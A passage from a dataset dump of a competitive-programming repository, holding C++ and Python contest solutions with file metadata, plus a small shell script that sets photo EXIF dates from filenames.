1 : -1;\n s[r][c] ^= 'X' ^ '.';\n\n auto calc = [&](int order) {\n int row = min(k, r);\n\n ROF(i, row, 0)\n {\n if (s[i][c] == '.')\n {\n if (r == i)\n temps[order][i]--;\n else\n temps[order][i] -= below[order][i][c] >= (n - k + 1);\n below[order][i][c] += fill;\n temps[order][i] += below[order][i][c] >= (n - k + 1);\n }\n else\n {\n below[order][i][c] += fill;\n if (r == i)\n temps[order][i]++;\n }\n answers[order][i] = min({m, answers[order][i + 1], temps[order][i]});\n }\n ss();\n r = n - r + 1;\n return answers[order][0];\n };\n\n int ans = calc(0);\n int ans2 = calc(1);\n return min(ans, ans2);\n };\n fori(q)\n {\n if (i % 1000 == 0)\n cerr << i << \"/\" << q << endl;\n ints(r, c); --c;\n int ans = get(r, c);\n //writeln(s);\n //writeln(below[0]);\n //writeln(\"--------------\");\n //writeln(below[1]);\n //writeln(\"--------------\");\n //writeln(temps[0]);\n //writeln(\"--------------\");\n //writeln(temps[1]);\n //writeln(\"--------------\");\n //writeln(answers[0]);\n //writeln(\"--------------\");\n //writeln(answers[1]);\n //writeln(\"--------------\");\n //writeln(ans);\n sum += ans;\n }\n writeln(sum);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \",\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti 
istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4746067523956299, "alphanum_fraction": 0.49820223450660706, "avg_line_length": 30.338027954101562, "blob_id": "c17de74ad5494dfbc51e25bed438c363fbcc3d51", "content_id": "3e034f6ed0e6e5657a8e41fa6a5dfd60cf132ebe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4450, "license_type": "no_license", "max_line_length": 174, "num_lines": 142, "path": "/2019/yandexFinal/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int INF = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//hungarian\npair<int, vector<int>> hungarian(vector<vector<int>> const& a)\n{\n int n = a.size() + 1;\n int m = a[0].size() + 1;\n vector<int> u(n), v(m), p(m), way(m);\n fori1(n)\n {\n p[0] = i;\n int j0 = 0;\n vector<int> minv(m, INF);\n vector<bool> used(m, false);\n do \n {\n used[j0] = true;\n int i0 = p[j0];\n int delta = INF;\n int j1;\n forj1(m)\n if (!used[j]) \n {\n int cur = a[i0 - 1][j - 1] - u[i0] - v[j];\n if (cur < minv[j])\n minv[j] = cur,\n way[j] = j0;\n if (minv[j] < delta)\n delta = minv[j],\n j1 = j;\n }\n forj(m)\n if (used[j])\n u[p[j]] += delta,\n v[j] -= delta;\n else\n minv[j] -= delta;\n j0 = j1;\n } \n while (p[j0] != 0);\n do \n {\n int j1 = way[j0];\n p[j0] = p[j1];\n j0 = j1;\n } \n while (j0);\n }\n vector<int> ans(n + 1);\n forj1(m)\n ans[p[j] - 1] = j - 1;\n return {-v[0], ans};\n}\n\n//}}}\n\n\n\nvoid run()\n{\n ints(n);\n vector<tuple<int, int, int>> a(n), b(n);\n fori(n)\n {\n ints(x, y, c);\n a[i] = {x, y, c};\n }\n fori(n)\n {\n ints(x, y, c);\n b[i] = {x, y, c};\n }\n auto get = [&](int i, int j) {\n auto [x1, y1, b1] = a[i];\n auto [x2, y2, b2] = b[j];\n return abs(x2 - x1) + abs(y2 - y1) + abs(b2 - b1);\n };\n vector<vector<int>> m(n, vector<int>(n));\n fori(n) forj(n) m[i][j] = get(i, j);\n auto [price, _] = hungarian(m);\n writeln(price);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename 
T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4701492488384247, "alphanum_fraction": 0.4776119291782379, "avg_line_length": 21.16666603088379, "blob_id": "f9d95bce7fa66303d5e037352e292341ae685961", "content_id": "40a40b2990e1ef8c2a384567f1b5b007920e62b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 47, "num_lines": 6, "path": "/CodeForce/1505/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, m = map(int, input().split())\na = []\nwhile n > 0:\n a.append(n % m)\n n //= m\nprint(\"YES\" if len(set(a)) == len(a) else \"NO\")\n\n" }, { "alpha_fraction": 0.4161115884780884, "alphanum_fraction": 0.43318068981170654, "avg_line_length": 34.32352828979492, "blob_id": "e5e055d9565ad5abbec0ddb37cd58f208b15bc35", "content_id": "987b951e5db579e9a51fd8d2aaff177728598747", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4804, "license_type": "no_license", "max_line_length": 174, "num_lines": 136, "path": "/CodeForce/1335/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, m);\n vector<string> colors(n);\n vector<string> field(n);\n readln(colors, field);\n\n vector<int> dx = {-1, 1, 0, 0};\n vector<int> dy = {0, 0, -1, 1};\n map<char, int> directions = {\n {'L', 2},\n {'R', 3},\n {'D', 1},\n {'U', 0}\n };\n int cur = 0;\n int black = 0;\n int ans = 0;\n vector<vector<int>> used(n, vector<int>(m, -1));\n fori(n)\n forj(m)\n if (used[i][j] == -1)\n {\n bool found = false;\n pii cycle;\n int u = i;\n int v = j;\n do {\n used[u][v] = cur;\n int d = directions[field[u][v]];\n u += dx[d];\n v += dy[d];\n } while (used[u][v] != cur);\n cur++;\n int maxLength = 0;\n do {\n used[u][v] = cur;\n int d = directions[field[u][v]];\n u += dx[d];\n v += dy[d];\n maxLength++;\n } while (used[u][v] != cur);\n cur++;\n vector<vector<pii>> levels(maxLength);\n function<void(int, int, int)> dfs = [&](int i, int j, int d) {\n used[i][j] = cur;\n levels[d % maxLength].pb({i, j});\n for (int k = 0; k < 4; ++k)\n {\n int u = i + dx[k];\n int v = j + dy[k];\n if (u < 0 || u >= n || j < 0 || j >= m)\n continue;\n if (u + dx[directions[field[u][v]]] != i || v + dy[directions[field[u][v]]] != j)\n continue;\n if (used[u][v] == cur)\n {\n maxLength = d + 1;\n continue;\n }\n dfs(u, v, d + 1);\n }\n };\n dfs(u, v, 0);\n for (auto& layer: levels)\n {\n ans++;\n bool found = false;\n for (auto& [i, j]: layer)\n if (colors[i][j] == '0')\n {\n black++;\n found = true;\n break;\n }\n }\n cur++;\n }\n writeln(ans, black);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename 
enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4430992603302002, "alphanum_fraction": 0.48426151275634766, "avg_line_length": 23.294116973876953, "blob_id": "e7c6b9e739d601ebe49aeb336be9c03079a05f8e", "content_id": "68a620197f4f4fae9b2eb8227bf756e6871132e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 826, "license_type": "no_license", "max_line_length": 88, "num_lines": 34, "path": "/CodeForce/0955/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ext/pb_ds/assoc_container.hpp>\n\nusing namespace std;\nusing namespace __gnu_pbds;\n\ntypedef long long ll;\n\nll sss(ll x)\n{\n ll temp = sqrt(x) - 1;\n while ((temp + 1) * (temp + 1) <= x)\n ++temp;\n return temp;\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n ll q, l, r;\n tree<ll, null_type, less<ll>, rb_tree_tag, tree_order_statistics_node_update> s;\n for (ll i = 2; i <= 1000000; ++i)\n for (ll x = i * i; ; x *= i)\n {\n if (ll temp = sss(x); temp * temp != x)\n s.insert(x);\n if (double(x) * i >= 1000000000000000001ll)\n break;\n }\n for (cin >> q; q > 0; --q)\n cin >> l >> r,\n cout << sss(r) - sss(l - 1) + s.order_of_key(r + 1) - s.order_of_key(l) << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4960511326789856, "alphanum_fraction": 0.5167356133460999, "avg_line_length": 29.045198440551758, 
"blob_id": "b10f133286fc40e5c72a52945800cf6bf3d1eb3c", "content_id": "f4de339c9d38d81a7725335425a6a47b6aee4fa7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5318, "license_type": "no_license", "max_line_length": 165, "num_lines": 177, "path": "/CodeForce/0689/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... 
Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\n//segmentTree\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T (T, T)> F;\n F f;\n T NEITRAL_ELEMENT;\n\n sparseTable(vector<T>& a, F g, T ne = 0)\n {\n NEITRAL_ELEMENT = ne;\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n, ne));\n fori(n)\n st[0][i] = a[i];\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))]);\n }\n\n T get(int l, int r)\n {\n int len = logs[++r - l];\n return f(st[len][l], st[len][r - (1 << len)]);\n }\n};\n\n//Igorjan\n\nvoid run()\n{\n ints(n);\n\tvector<int> a(n), b(n);\n\treadln(a, b);\n sparseTable<int> fa(a, [](int x, int y){return max(x, y);}, numeric_limits<int>::min()), fb(b, [](int x, int y){return min(x, y);}, numeric_limits<int>::max());\n ll 
ans = 0;\n fori(n)\n {\n int m;\n int l1 = i;\n int r1 = n;\n while (r1 - l1 > 1)\n {\n m = (r1 + l1) >> 1;\n (fa.get(i, m) < fb.get(i, m)) ? l1 = m : r1 = m;\n }\n int index1 = l1 + (fa.get(i, l1) < fb.get(i, l1));\n if (index1 == n)\n continue;\n int temp = fa.get(i, index1);//min(n - 1, index1));\n int l2 = index1;\n int r2 = n;\n while (r2 - l2 > 1)\n {\n m = (r2 + l2) >> 1;\n (fa.get(i, m) == temp && fb.get(i, m) == temp) ? l2 = m : r2 = m;\n }\n int index2 = l2 + (fa.get(i, l2) == temp && fb.get(i, l2) == temp);\n ans += index2 - index1;\n //wr(index1, index2);\n //cout.flush();\n }\n writeln(ans);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.38770899176597595, "alphanum_fraction": 0.41120651364326477, "avg_line_length": 22.294736862182617, "blob_id": "b922ddb2ba4bec6b57509b82bcb94823d615b1fc", "content_id": "5fad7730dae057ff1f901b63a237465dd469445e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2213, 
"license_type": "no_license", "max_line_length": 99, "num_lines": 95, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.01/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#include <set>\n#define INF 1000000007\n\nusing namespace std;\n\nvector< vector<int> > g;\nvector< vector<bool> > used;\nvector<int> t, ans;\nint n, m, k;\nset<int> helpi[2];\nvector< set<int> > helpj[2];\nbool f = false;\n\nvoid dfs(int i, int j, int t)\n{\n if (used[i][j] || g[i][j] <= t)\n return;\n used[i][j] = true;\n helpj[!f][i].insert(j);\n helpi[!f].insert(i);\n if (i > 0)\n dfs(i - 1, j, t);\n if (i < n - 1)\n dfs(i + 1, j, t);\n if (j > 0)\n dfs(i, j - 1, t);\n if (j < m - 1)\n dfs(i, j + 1, t);\n}\n\nvoid run()\n{\n scanf(\"%d %d\\n\", &n, &m);\n g.clear();\n g.resize(n + 1);\n for (int i = 0; i < n; i++)\n {\n helpi[0].insert(i);\n g[i].resize(m + 1);\n for (int j = 0; j < m; j++)\n scanf(\"%d\", &g[i][j]);\n }\n int ttt;\n scanf(\"%d\\n\", &ttt);\n t.clear();\n t.resize(ttt + 1);\n for (int i = 0; i < ttt; i++)\n scanf(\"%d\", &t[i]);\n int c = 0;\n helpj[0].clear();\n helpj[0].resize(n + 1);\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n helpj[0][i].insert(j);\n for (int k = 0; k < ttt; k++)\n {\n if (k > 0 && t[k - 1] == t[k])\n {\n printf(\"%d%c\", c, k == ttt - 1 ? '\\n' : ' ');\n continue;\n }\n helpj[!f].clear();\n helpj[!f].resize(n + 1);\n helpi[!f].clear();\n c = 0;\n used.clear();\n used.resize(n + 1);\n for (int i = 0; i < n; i++)\n used[i].resize(m + 1, false);\n for (set<int>::iterator it = helpi[f].begin(); it != helpi[f].end(); it++)\n for (set<int>::iterator it2 = helpj[f][*it].begin(); it2 != helpj[f][*it].end(); it2++)\n if (!used[*it][*it2] && g[*it][*it2] > t[k])\n dfs(*it, *it2, t[k]),\n c++;\n printf(\"%d%c\", c, k == ttt - 1 ? 
'\\n' : ' ');\n f = !f;\n }\n}\n\nint main()\n{\n // freopen(\"matching.in\", \"r\", stdin);\n // freopen(\"matching.out\", \"w+\", stdout);\n int T;\n scanf(\"%d\\n\", &T);\n for (int TT = 0; TT < T; TT++)\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4893617033958435, "alphanum_fraction": 0.563829779624939, "avg_line_length": 22.25, "blob_id": "8995f96686e89e5db16d2e6b00f0d7ab1886d5b6", "content_id": "0de85e7065bd3d256432088c76c0421d2478d79d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/CodeForce/0519/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=input()\na=[sum(map(int,input().split()))for i in[0,1,2]]\nprint(a[0]-a[1])\nprint(a[1]-a[2])\n\n" }, { "alpha_fraction": 0.44427481293678284, "alphanum_fraction": 0.5145038366317749, "avg_line_length": 37.52941131591797, "blob_id": "16066c4f615dc5b9e884a0246fdbbda775de794f", "content_id": "55414dc9f7ba1bd19f12b7617033a679f1bbf0eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 655, "license_type": "no_license", "max_line_length": 99, "num_lines": 17, "path": "/scripts/nameToDate.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "dateRegex=\"IMG_([0-9][0-9][0-9][0-9])([0-9][0-9])([0-9][0-9])_([0-9][0-9])([0-9][0-9])([0-9][0-9])\"\nshift=\"+0300\"\nfor f in \"$@\"; do\n if [[ ${f} =~ $dateRegex ]]; then\n year=${BASH_REMATCH[1]}\n month=${BASH_REMATCH[2]}\n day=${BASH_REMATCH[3]}\n hour=${BASH_REMATCH[4]}\n minute=${BASH_REMATCH[5]}\n second=${BASH_REMATCH[5]}\n date=\"$year-$month-$day $hour:$minute:$second\"\n echo \"Date found $f $date\"\n exiv2 -v -M\"set Exif.Image.DateTime $date\" $f 1>/dev/null 2>&1\n exiv2 -v -M\"set Exif.Image.DateTimeOriginal $date\" $f 1>/dev/null 2>&1\n touch -d \"$date $shift\" \"$f\"\n fi\ndone\n" }, { "alpha_fraction": 0.3639240562915802, 
"alphanum_fraction": 0.3892405033111572, "avg_line_length": 18.15151596069336, "blob_id": "fa0fed0b77bb1da30b21260a54007946a04812db", "content_id": "df8085774714f055355beceaf8ddc06e1a8e9a9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 632, "license_type": "no_license", "max_line_length": 39, "num_lines": 33, "path": "/2013/2013yandex/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stdio.h>\n\nusing namespace std;\n\nstring a, s = \"0000\";\n\nint findd(int k, char c) {\n for (int i = k; i < 8; i++)\n if (a[i] == c)\n return i;\n return -1;\n}\n\nint main() {\n freopen(\"number.in\", \"r\", stdin);\n freopen(\"number.out\", \"w\", stdout);\n cin >> a;\n int k = 0, prev = 0;\n for (int i = 0; i < 4; i++) {\n while (findd(k, s[i]) == -1)\n s[i]++;\n prev = k;\n k = findd(k, s[i]) + 1;\n if (8 - k + 1 < 4 - i) {\n s[i--]++;\n k = prev;\n continue;\n }\n }\n cout << s << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.4285714328289032, "alphanum_fraction": 0.48571428656578064, "avg_line_length": 16.5, "blob_id": "3d532a3c3762edb8529c467f1b1a131b1628e7a4", "content_id": "9f5efebb9c0f80e4a8e76b4661bf559d7e52610d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/CodeForce/1505/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "x = int(input())\nprint(2 - x ** 2)\n" }, { "alpha_fraction": 0.434883713722229, "alphanum_fraction": 0.4441860318183899, "avg_line_length": 19.5, "blob_id": "ce4f2568b16396b0c95b5cb5042859e799f0faa1", "content_id": "c121288a5403e31a3d43f9af6a3585c7874017c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 430, "license_type": "no_license", "max_line_length": 47, "num_lines": 20, "path": "/CodeForce/0675/C.cpp", 
"repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\r\n\r\nusing namespace std;\r\n\r\nint main()\r\n{\r\n int n, ans = 0;\r\n scanf(\"%d\", &n);\r\n\tvector<long long> a(n), b(n, 0);\r\n for (int i = 0; i < n; ++i)\r\n scanf(\"%lld\", &a[i]);\r\n partial_sum(a.begin(), a.end(), b.begin());\r\n map<long long, int> x;\r\n for (auto y : b)\r\n x[y]++;\r\n for (auto y : x)\r\n ans = max(ans, y.second);\r\n printf(\"%d\\n\", n - ans);\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.42753443121910095, "alphanum_fraction": 0.4453066289424896, "avg_line_length": 26.269624710083008, "blob_id": "cedf8405a783a4784f808f1f2d9503934064b00a", "content_id": "8ce9cc823f48e8148fd375f7cf9f325ad46d62f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7990, "license_type": "no_license", "max_line_length": 174, "num_lines": 293, "path": "/CodeForce/0192/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n vector<T> add;\n //vector<T> pos;\n function<T(const T&, const T&)> f = [](const T& a, const T& b) { return min(a, b); };\n T NEITRAL_ELEMENT = numeric_limits<T>::max();\n \n void push(int v, int tl, int tr)\n {\n if (add[v] == 0) return;\n\n t[v] += add[v];\n if (tl != tr)\n add[v * 2] += add[v],\n add[v * 2 + 1] += add[v];\n add[v] = 0;\n }\n\n void build(const vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n {\n t[v] = a[l];\n //pos[v] = l;\n }\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n //if (left > right)\n //pos[v] = pos[v * 2];\n //else\n //pos[v] = pos[v * 2 + 1];\n t[v] = f(left, right);\n }\n };\n \n segmentTree(const vector<T>& a)\n {\n n = a.size();\n 